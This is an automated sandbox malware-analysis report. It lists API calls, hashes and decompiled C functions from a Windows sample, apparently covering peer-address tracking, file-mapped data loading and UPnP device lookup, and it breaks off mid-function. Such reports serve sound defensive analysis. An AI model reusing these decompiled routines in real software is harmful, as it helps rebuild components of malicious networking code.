                                                                                  0x0040ed42
                                                                                  0x0040ed51
                                                                                  0x0040ed60
                                                                                  0x0040ed71
                                                                                  0x0040ecf2
                                                                                  0x0040ecf2
                                                                                  0x0040ecf5
                                                                                  0x0040ecf8
                                                                                  0x0040ed06
                                                                                  0x0040ed06
                                                                                  0x0040ecd7
                                                                                  0x0040ece6
                                                                                  0x0040ece6
                                                                                  0x0040ec18
                                                                                  0x0040ec18
                                                                                  0x0040ec1b
                                                                                  0x0040edce
                                                                                  0x0040edce
                                                                                  0x0040ec21
                                                                                  0x0040ec27
                                                                                  0x0040ec43
                                                                                  0x0040ec54
                                                                                  0x0040ec6c
                                                                                  0x0040ec76
                                                                                  0x0040ec80
                                                                                  0x0040ec84
                                                                                  0x0040ec88
                                                                                  0x0040ec9a
                                                                                  0x0040eca6
                                                                                  0x0040ecaa
                                                                                  0x0040ecb4
                                                                                  0x0040ecbb
                                                                                  0x00000000
                                                                                  0x0040ecc1
                                                                                  0x0040ecc1
                                                                                  0x0040eccd
                                                                                  0x0040eccd
                                                                                  0x0040ec29
                                                                                  0x0040ec3b
                                                                                  0x0040ec3b
                                                                                  0x0040ec27
                                                                                  0x0040ec1b

                                                                                  APIs
                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 0040EC06
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040EC30
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040EC43
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,?), ref: 0040EC54
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040ECDB
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040ED76
                                                                                  • setsockopt.WS2_32 ref: 0040EDAC
                                                                                  • closesocket.WS2_32(?), ref: 0040EDB9
                                                                                    • Part of subcall function 0040C210: NtQuerySystemTime.NTDLL ref: 0040C21A
                                                                                    • Part of subcall function 0040C210: RtlTimeToSecondsSince1980.NTDLL ref: 0040C228
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 671207744-0
                                                                                  • Opcode ID: eac7544d65530684678831c593fe10f9f5ab3dca7285b72a3d6bbcbf7238f9b5
                                                                                  • Instruction ID: a63a62e2eddc4c6ea33aec9a9dae6784646f40805859537cb5bfc137b0e9617d
                                                                                  • Opcode Fuzzy Hash: eac7544d65530684678831c593fe10f9f5ab3dca7285b72a3d6bbcbf7238f9b5
                                                                                  • Instruction Fuzzy Hash: CC51B175608702AFC704DF29D488B96FBE0BF88314F008A2EE49D83351D735A554CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00409D70(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                                                  				signed char _v5;
                                                                                  				signed int _v12;
                                                                                  				signed int _v13;
                                                                                  				signed int _v20;
                                                                                  				signed char _t47;
                                                                                  				char* _t49;
                                                                                  				char* _t52;
                                                                                  				signed int _t56;
                                                                                  				void* _t60;
                                                                                  				char* _t63;
                                                                                  				signed int _t68;
                                                                                  				char* _t69;
                                                                                  				signed int _t71;
                                                                                  				signed int _t79;
                                                                                  				signed int _t81;
                                                                                  				intOrPtr _t83;
                                                                                  				char* _t85;
                                                                                  				void* _t87;
                                                                                  				void* _t88;
                                                                                  				void* _t90;
                                                                                  				void* _t94;
                                                                                  
                                                                                  				_t47 = E00409AB0(_a4);
                                                                                  				_t88 = _t87 + 4;
                                                                                  				_t65 = _t47 & 0x000000ff;
                                                                                  				if((_t47 & 0x000000ff) == 0) {
                                                                                  					_t49 = strstr(E00409820(_t65, _a4), "127.");
                                                                                  					_t90 = _t88 + 0xc;
                                                                                  					__eflags = _t49;
                                                                                  					if(_t49 == 0) {
                                                                                  						L6:
                                                                                  						EnterCriticalSection(0x414e4c);
                                                                                  						_v5 = 0;
                                                                                  						_v12 = 0;
                                                                                  						while(1) {
                                                                                  							__eflags = _v12 -  *0x414e84; // 0x0
                                                                                  							if(__eflags >= 0) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_t83 =  *((intOrPtr*)(0x414e88 + _v12 * 4));
                                                                                  							__eflags =  *((intOrPtr*)(_t83 + 4)) - _a4;
                                                                                  							if( *((intOrPtr*)(_t83 + 4)) != _a4) {
                                                                                  								_t85 = _v12 + 1;
                                                                                  								__eflags = _t85;
                                                                                  								_v12 = _t85;
                                                                                  								continue;
                                                                                  							}
                                                                                  							_t60 = E0040C210();
                                                                                  							_t50 = _t60 - _a8;
                                                                                  							 *((intOrPtr*)( *((intOrPtr*)(0x414e88 + _v12 * 4)) + 8)) = _t60 - _a8;
                                                                                  							_v5 = 1;
                                                                                  							break;
                                                                                  						}
                                                                                  						E00409CC0(_t50);
                                                                                  						_t52 = _v5 & 0x000000ff;
                                                                                  						__eflags = _t52;
                                                                                  						if(_t52 != 0) {
                                                                                  							L23:
                                                                                  							LeaveCriticalSection(0x414e4c);
                                                                                  							return _t52;
                                                                                  						}
                                                                                  						_v13 = 0;
                                                                                  						__eflags =  *0x414e84 - 0x200;
                                                                                  						if( *0x414e84 == 0x200) {
                                                                                  							_v13 = 1;
                                                                                  						}
                                                                                  						_t52 = E00408E40(0xc);
                                                                                  						_v20 = _t52;
                                                                                  						__eflags = _v20;
                                                                                  						if(_v20 == 0) {
                                                                                  							goto L23;
                                                                                  						} else {
                                                                                  							 *((intOrPtr*)(_v20 + 4)) = _a4;
                                                                                  							 *((intOrPtr*)(_v20 + 8)) = E0040C210() - _a8;
                                                                                  							__eflags = _v13 & 0x000000ff;
                                                                                  							if((_v13 & 0x000000ff) == 0) {
                                                                                  								_t79 =  *0x414e84; // 0x0
                                                                                  								_t55 = _v20;
                                                                                  								 *((intOrPtr*)(0x414e88 + _t79 * 4)) = _v20;
                                                                                  								_t68 =  *0x414e84; // 0x0
                                                                                  								_t69 = _t68 + 1;
                                                                                  								__eflags = _t69;
                                                                                  								 *0x414e84 = _t69;
                                                                                  								L21:
                                                                                  								_t52 = E00409CC0(_t55);
                                                                                  								__eflags = _a12 & 0x000000ff;
                                                                                  								if((_a12 & 0x000000ff) != 0) {
                                                                                  									_t52 = E004099A0(_t52);
                                                                                  								}
                                                                                  								goto L23;
                                                                                  							} else {
                                                                                  								goto L17;
                                                                                  							}
                                                                                  							while(1) {
                                                                                  								L17:
                                                                                  								_t56 =  *0x414e84; // 0x0
                                                                                  								__eflags =  *(0x414e84[_t56]);
                                                                                  								if( *(0x414e84[_t56]) == 0) {
                                                                                  									break;
                                                                                  								}
                                                                                  								Sleep(1);
                                                                                  							}
                                                                                  							_t81 =  *0x414e84; // 0x0
                                                                                  							 *(0x414e84[_t81]) = 1;
                                                                                  							_t71 =  *0x414e84; // 0x0
                                                                                  							E00408FB0(0x414e84[_t71]);
                                                                                  							_t55 =  *0x414e84; // 0x0
                                                                                  							0x414e84[_t55] = _v20;
                                                                                  							goto L21;
                                                                                  						}
                                                                                  					}
                                                                                  					_t63 = strstr(E00409820(_t65, _a4), ".127");
                                                                                  					_t94 = _t90 + 0xc;
                                                                                  					__eflags = _t63;
                                                                                  					if(_t63 == 0) {
                                                                                  						L5:
                                                                                  						return _t63;
                                                                                  					}
                                                                                  					_t63 = strstr(E00409820(_a4, _a4), ".127.");
                                                                                  					_t90 = _t94 + 0xc;
                                                                                  					__eflags = _t63;
                                                                                  					if(_t63 != 0) {
                                                                                  						goto L6;
                                                                                  					}
                                                                                  					goto L5;
                                                                                  				}
                                                                                  				return _t47;
                                                                                  			}
























                                                                                  0x00409d7a
                                                                                  0x00409d7f
                                                                                  0x00409d82
                                                                                  0x00409d87
                                                                                  0x00409da0
                                                                                  0x00409da5
                                                                                  0x00409da8
                                                                                  0x00409daa
                                                                                  0x00409ded
                                                                                  0x00409df2
                                                                                  0x00409df8
                                                                                  0x00409dfc
                                                                                  0x00409e0e
                                                                                  0x00409e11
                                                                                  0x00409e17
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409e1c
                                                                                  0x00409e26
                                                                                  0x00409e29
                                                                                  0x00409e08
                                                                                  0x00409e08
                                                                                  0x00409e0b
                                                                                  0x00000000
                                                                                  0x00409e0b
                                                                                  0x00409e2b
                                                                                  0x00409e30
                                                                                  0x00409e3d
                                                                                  0x00409e40
                                                                                  0x00000000
                                                                                  0x00409e40
                                                                                  0x00409e48
                                                                                  0x00409e4d
                                                                                  0x00409e51
                                                                                  0x00409e53
                                                                                  0x00409f29
                                                                                  0x00409f2e
                                                                                  0x00000000
                                                                                  0x00409f2e
                                                                                  0x00409e59
                                                                                  0x00409e5d
                                                                                  0x00409e67
                                                                                  0x00409e69
                                                                                  0x00409e69
                                                                                  0x00409e6f
                                                                                  0x00409e77
                                                                                  0x00409e7a
                                                                                  0x00409e7e
                                                                                  0x00000000
                                                                                  0x00409e84
                                                                                  0x00409e8a
                                                                                  0x00409e98
                                                                                  0x00409e9f
                                                                                  0x00409ea1
                                                                                  0x00409ef8
                                                                                  0x00409efe
                                                                                  0x00409f01
                                                                                  0x00409f08
                                                                                  0x00409f0e
                                                                                  0x00409f0e
                                                                                  0x00409f11
                                                                                  0x00409f17
                                                                                  0x00409f17
                                                                                  0x00409f20
                                                                                  0x00409f22
                                                                                  0x00409f24
                                                                                  0x00409f24
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409ea3
                                                                                  0x00409ea3
                                                                                  0x00409ea3
                                                                                  0x00409eaf
                                                                                  0x00409eb2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409eb6
                                                                                  0x00409eb6
                                                                                  0x00409ebe
                                                                                  0x00409ecb
                                                                                  0x00409ed1
                                                                                  0x00409edf
                                                                                  0x00409ee7
                                                                                  0x00409eef
                                                                                  0x00000000
                                                                                  0x00409eef
                                                                                  0x00409e7e
                                                                                  0x00409dbe
                                                                                  0x00409dc3
                                                                                  0x00409dc6
                                                                                  0x00409dc8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409ddc
                                                                                  0x00409de1
                                                                                  0x00409de4
                                                                                  0x00409de6
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409de6
                                                                                  0x00000000

                                                                                  APIs
                                                                                    • Part of subcall function 00409AB0: gethostname.WS2_32(?,00000100), ref: 00409ACC
                                                                                    • Part of subcall function 00409AB0: gethostbyname.WS2_32(?), ref: 00409ADE
                                                                                  • strstr.NTDLL ref: 00409DA0
                                                                                  • strstr.NTDLL ref: 00409DBE
                                                                                  • strstr.NTDLL ref: 00409DDC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: strstr$gethostbynamegethostname
                                                                                  • String ID: .127$.127.$127.
                                                                                  • API String ID: 2540993189-1573993753
                                                                                  • Opcode ID: 8884d166f746be7126d4f476aea7d7a78fa78d4b36ab4e2f45a01bafcb5ad5fb
                                                                                  • Instruction ID: 183aa7514d5840da55b51ccb33f3d2103a3eb28b4696c2bac9d1f078e1a22ee6
                                                                                  • Opcode Fuzzy Hash: 8884d166f746be7126d4f476aea7d7a78fa78d4b36ab4e2f45a01bafcb5ad5fb
                                                                                  • Instruction Fuzzy Hash: F45190B4944306DBCB04EF64E8417AA7BB5BB84304F14803EE805A73D2E779ED80CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040A020() {
                                                                                  				void* _v8;
                                                                                  				signed int _v12;
                                                                                  				void* _v16;
                                                                                  				void* _v20;
                                                                                  				long _v24;
                                                                                  				DWORD* _v28;
                                                                                  				signed int _v32;
                                                                                  				intOrPtr _t41;
                                                                                  				void* _t74;
                                                                                  
                                                                                  				InitializeCriticalSection(0x414e4c);
                                                                                  				_v12 = 0;
                                                                                  				while(_v12 < 0x200) {
                                                                                  					E00409D70( *((intOrPtr*)(0x4133b8 + _v12 * 4)), E0040C210(), 0);
                                                                                  					_t74 = _t74 + 0xc;
                                                                                  					_v12 = _v12 + 1;
                                                                                  				}
                                                                                  				_v8 = CreateFileW(0x414c40, 0x80000000, 0, 0, 3, 0, 0);
                                                                                  				if(_v8 != 0xffffffff) {
                                                                                  					_v16 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                                                  					if(_v16 != 0) {
                                                                                  						_v20 = MapViewOfFile(_v16, 4, 0, 0, 0);
                                                                                  						if(_v20 != 0) {
                                                                                  							_v24 = GetFileSize(_v8, 0);
                                                                                  							_v28 = 0;
                                                                                  							_v32 = 0;
                                                                                  							while(_v28 < _v24 && _v32 < 0x200) {
                                                                                  								E00409D70( *((intOrPtr*)(_v20 + _v32 * 8)), E0040C210() -  *((intOrPtr*)(_v20 + 4 + _v32 * 8)), 0);
                                                                                  								_t74 = _t74 + 0xc;
                                                                                  								_v28 =  &(_v28[2]);
                                                                                  								_v32 = _v32 + 1;
                                                                                  							}
                                                                                  							UnmapViewOfFile(_v20);
                                                                                  						}
                                                                                  						CloseHandle(_v16);
                                                                                  					}
                                                                                  					CloseHandle(_v8);
                                                                                  				}
                                                                                  				E00409A90();
                                                                                  				_t41 =  *0x414e68; // 0x0
                                                                                  				return E0040BF50(_t41, 0, E00409960, 0, 0, 0);
                                                                                  			}












                                                                                  0x0040a02b
                                                                                  0x0040a031
                                                                                  0x0040a043
                                                                                  0x0040a05f
                                                                                  0x0040a064
                                                                                  0x0040a040
                                                                                  0x0040a040
                                                                                  0x0040a083
                                                                                  0x0040a08a
                                                                                  0x0040a0a4
                                                                                  0x0040a0ab
                                                                                  0x0040a0c3
                                                                                  0x0040a0ca
                                                                                  0x0040a0d8
                                                                                  0x0040a0db
                                                                                  0x0040a0e2
                                                                                  0x0040a0fd
                                                                                  0x0040a12a
                                                                                  0x0040a12f
                                                                                  0x0040a0f1
                                                                                  0x0040a0fa
                                                                                  0x0040a0fa
                                                                                  0x0040a138
                                                                                  0x0040a138
                                                                                  0x0040a142
                                                                                  0x0040a142
                                                                                  0x0040a14c
                                                                                  0x0040a14c
                                                                                  0x0040a152
                                                                                  0x0040a164
                                                                                  0x0040a175

                                                                                  APIs
                                                                                  • InitializeCriticalSection.KERNEL32(00414E4C,?,?,?,?,?,?,004068A0), ref: 0040A02B
                                                                                  • CreateFileW.KERNEL32(00414C40,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040A07D
                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040A09E
                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040A0BD
                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040A0D2
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040A138
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A142
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040A14C
                                                                                    • Part of subcall function 0040C210: NtQuerySystemTime.NTDLL ref: 0040C21A
                                                                                    • Part of subcall function 0040C210: RtlTimeToSecondsSince1980.NTDLL ref: 0040C228
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                  • String ID:
                                                                                  • API String ID: 439099756-0
                                                                                  • Opcode ID: 97191d7563d11220bb9c43c848a5229161b8639f145c7d4a366d64e3fea0f839
                                                                                  • Instruction ID: acc5326b5384c580b36ed7733cff79295e061d02a32601855545f98bc6dcfb13
                                                                                  • Opcode Fuzzy Hash: 97191d7563d11220bb9c43c848a5229161b8639f145c7d4a366d64e3fea0f839
                                                                                  • Instruction Fuzzy Hash: 4D413A74E40308ABDB10DFA4CC4ABAEB774BB44704F208569E6117B2C1C6B96A51CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00404200() {
                                                                                  				void* _v8;
                                                                                  				void* _v12;
                                                                                  				void* _v16;
                                                                                  				long _v20;
                                                                                  				void* _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				void* _t35;
                                                                                  				intOrPtr _t45;
                                                                                  				void* _t66;
                                                                                  				void* _t67;
                                                                                  
                                                                                  				InitializeCriticalSection(0x4143f0);
                                                                                  				_t35 = CreateFileW(0x414620, 0x80000000, 0, 0, 3, 0, 0);
                                                                                  				_v8 = _t35;
                                                                                  				if(_v8 != 0xffffffff) {
                                                                                  					_v12 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                                                  					if(_v12 == 0) {
                                                                                  						L14:
                                                                                  						return CloseHandle(_v8);
                                                                                  					}
                                                                                  					_v16 = MapViewOfFile(_v12, 4, 0, 0, 0);
                                                                                  					if(_v16 == 0) {
                                                                                  						L13:
                                                                                  						CloseHandle(_v12);
                                                                                  						goto L14;
                                                                                  					}
                                                                                  					_v20 = GetFileSize(_v8, 0);
                                                                                  					_v24 = _v16;
                                                                                  					while(_v20 != 0) {
                                                                                  						if(_v20 >= 0x100) {
                                                                                  							_t45 = E0040B4F0(_v24, _v24);
                                                                                  							_t67 = _t66 + 4;
                                                                                  							_v28 = _t45;
                                                                                  							if(_v28 != 0) {
                                                                                  								_v20 = _v20 - 0x100;
                                                                                  								if(_v20 >=  *((intOrPtr*)(_v28 + 0xc))) {
                                                                                  									E004040F0(_v24, _v28, _v24,  *((intOrPtr*)(_v28 + 0xc)) + 0x100, 0);
                                                                                  									_t66 = _t67 + 0x10;
                                                                                  									_v20 = _v20 -  *((intOrPtr*)(_v28 + 0xc));
                                                                                  									continue;
                                                                                  								}
                                                                                  								E00408FB0(_v28);
                                                                                  								break;
                                                                                  							}
                                                                                  							break;
                                                                                  						}
                                                                                  						break;
                                                                                  					}
                                                                                  					UnmapViewOfFile(_v16);
                                                                                  					goto L13;
                                                                                  				}
                                                                                  				return _t35;
                                                                                  			}













                                                                                  0x0040420b
                                                                                  0x00404225
                                                                                  0x0040422b
                                                                                  0x00404232
                                                                                  0x0040424c
                                                                                  0x00404253
                                                                                  0x0040431b
                                                                                  0x00000000
                                                                                  0x0040431f
                                                                                  0x0040426b
                                                                                  0x00404272
                                                                                  0x00404311
                                                                                  0x00404315
                                                                                  0x00000000
                                                                                  0x00404315
                                                                                  0x00404284
                                                                                  0x0040428a
                                                                                  0x0040428d
                                                                                  0x0040429a
                                                                                  0x004042a2
                                                                                  0x004042a7
                                                                                  0x004042aa
                                                                                  0x004042b1
                                                                                  0x004042be
                                                                                  0x004042ca
                                                                                  0x004042f1
                                                                                  0x004042f6
                                                                                  0x00404302
                                                                                  0x00000000
                                                                                  0x00404302
                                                                                  0x004042d0
                                                                                  0x00000000
                                                                                  0x004042d5
                                                                                  0x00000000
                                                                                  0x004042b3
                                                                                  0x00000000
                                                                                  0x0040429c
                                                                                  0x0040430b
                                                                                  0x00000000
                                                                                  0x0040430b
                                                                                  0x00404328

                                                                                  APIs
                                                                                  • InitializeCriticalSection.KERNEL32(004143F0,?,?,?,?,?,0040686A), ref: 0040420B
                                                                                  • CreateFileW.KERNEL32(00414620,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,0040686A), ref: 00404225
                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00404246
                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00404265
                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040427E
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040430B
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00404315
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040431F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                  • String ID:
                                                                                  • API String ID: 3956458805-0
                                                                                  • Opcode ID: b3648e58c9864d6b8b8bc5f3b80ef7b3f109043bc3ac7d8c402e44e73b7fa38e
                                                                                  • Instruction ID: 273e13aa2dc466d5bf8d435bda3035c4f53c51da1c9f1d325813a3c854b8a587
                                                                                  • Opcode Fuzzy Hash: b3648e58c9864d6b8b8bc5f3b80ef7b3f109043bc3ac7d8c402e44e73b7fa38e
                                                                                  • Instruction Fuzzy Hash: 2C3133B4E00209EFDB14DFA4DC49FAEB770AB88704F208569F601772C1D7B96581CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 48%
                                                                                  			E0040CC90(intOrPtr* _a4, WCHAR* _a8) {
                                                                                  				char _v8;
                                                                                  				WCHAR* _v12;
                                                                                  				WCHAR* _v16;
                                                                                  				void* _v20;
                                                                                  				WCHAR* _v24;
                                                                                  				intOrPtr* _v28;
                                                                                  				WCHAR* _v32;
                                                                                  				intOrPtr* _t65;
                                                                                  				void* _t99;
                                                                                  
                                                                                  				_v12 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_push( &_v8);
                                                                                  				_push(_a4);
                                                                                  				if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x20))))() == 0 && _v8 != 0) {
                                                                                  					_v16 = 0;
                                                                                  					while(_v16 < _v8) {
                                                                                  						_v20 = 0;
                                                                                  						_push( &_v20);
                                                                                  						_push(_v16);
                                                                                  						_push(_a4);
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x1c))))() != 0 || _v20 == 0) {
                                                                                  							L21:
                                                                                  							_v16 = _v16 + 1;
                                                                                  							continue;
                                                                                  						} else {
                                                                                  							_v24 = 0;
                                                                                  							_push( &_v24);
                                                                                  							_push(_v20);
                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xa4))))() == 0 && _v24 != 0) {
                                                                                  								if(lstrcmpiW(_v24, L"device") == 0) {
                                                                                  									_t65 = E0040C5B0(_v20, L"deviceType");
                                                                                  									_t99 = _t99 + 8;
                                                                                  									_v28 = _t65;
                                                                                  									if(_v28 != 0) {
                                                                                  										_v32 = 0;
                                                                                  										_push( &_v32);
                                                                                  										_push(_v28);
                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x68))))() == 0 && _v32 != 0) {
                                                                                  											if(lstrcmpiW(_v32, _a8) == 0) {
                                                                                  												_v12 = _v20;
                                                                                  											}
                                                                                  											__imp__#6(_v32);
                                                                                  										}
                                                                                  										 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                  									}
                                                                                  								}
                                                                                  								__imp__#6(_v24);
                                                                                  							}
                                                                                  							if(_v12 == 0) {
                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                  								goto L21;
                                                                                  							} else {
                                                                                  							}
                                                                                  						}
                                                                                  						goto L22;
                                                                                  					}
                                                                                  				}
                                                                                  				L22:
                                                                                  				return _v12;
                                                                                  			}












                                                                                  0x0040cc96
                                                                                  0x0040cc9d
                                                                                  0x0040cca7
                                                                                  0x0040ccb0
                                                                                  0x0040ccb8
                                                                                  0x0040ccc8
                                                                                  0x0040ccda
                                                                                  0x0040cce6
                                                                                  0x0040ccf0
                                                                                  0x0040ccf4
                                                                                  0x0040ccfd
                                                                                  0x0040cd05
                                                                                  0x0040cde3
                                                                                  0x0040ccd7
                                                                                  0x00000000
                                                                                  0x0040cd15
                                                                                  0x0040cd15
                                                                                  0x0040cd1f
                                                                                  0x0040cd28
                                                                                  0x0040cd33
                                                                                  0x0040cd54
                                                                                  0x0040cd5f
                                                                                  0x0040cd64
                                                                                  0x0040cd67
                                                                                  0x0040cd6e
                                                                                  0x0040cd70
                                                                                  0x0040cd7a
                                                                                  0x0040cd83
                                                                                  0x0040cd8b
                                                                                  0x0040cda3
                                                                                  0x0040cda8
                                                                                  0x0040cda8
                                                                                  0x0040cdaf
                                                                                  0x0040cdaf
                                                                                  0x0040cdc1
                                                                                  0x0040cdc1
                                                                                  0x0040cd6e
                                                                                  0x0040cdc7
                                                                                  0x0040cdc7
                                                                                  0x0040cdd1
                                                                                  0x0040cde1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040cdd3
                                                                                  0x0040cdd1
                                                                                  0x00000000
                                                                                  0x0040cd05
                                                                                  0x0040ccda
                                                                                  0x0040cde8
                                                                                  0x0040cdee

                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32(00000000,device), ref: 0040CD4C
                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040CD9B
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CDAF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CDC7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeStringlstrcmpi
                                                                                  • String ID: device$deviceType
                                                                                  • API String ID: 1602765415-3511266565
                                                                                  • Opcode ID: ea68b65162a0bfbb9c3a4dcc947aafaa99d256b286d0777428a079b1f42d990b
                                                                                  • Instruction ID: 46634be8c8d3b4bec74d72c832fec089d40fd577d228b9d0a634236a651e6f02
                                                                                  • Opcode Fuzzy Hash: ea68b65162a0bfbb9c3a4dcc947aafaa99d256b286d0777428a079b1f42d990b
                                                                                  • Instruction Fuzzy Hash: 2341DA75A0020ADFCB04DF98C884BEFBBB5BF48304F108269E515A7390D778AE81CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 48%
                                                                                  			E0040CAB0(intOrPtr* _a4, WCHAR* _a8) {
                                                                                  				char _v8;
                                                                                  				WCHAR* _v12;
                                                                                  				WCHAR* _v16;
                                                                                  				void* _v20;
                                                                                  				WCHAR* _v24;
                                                                                  				intOrPtr* _v28;
                                                                                  				WCHAR* _v32;
                                                                                  				intOrPtr* _t65;
                                                                                  				void* _t99;
                                                                                  
                                                                                  				_v12 = 0;
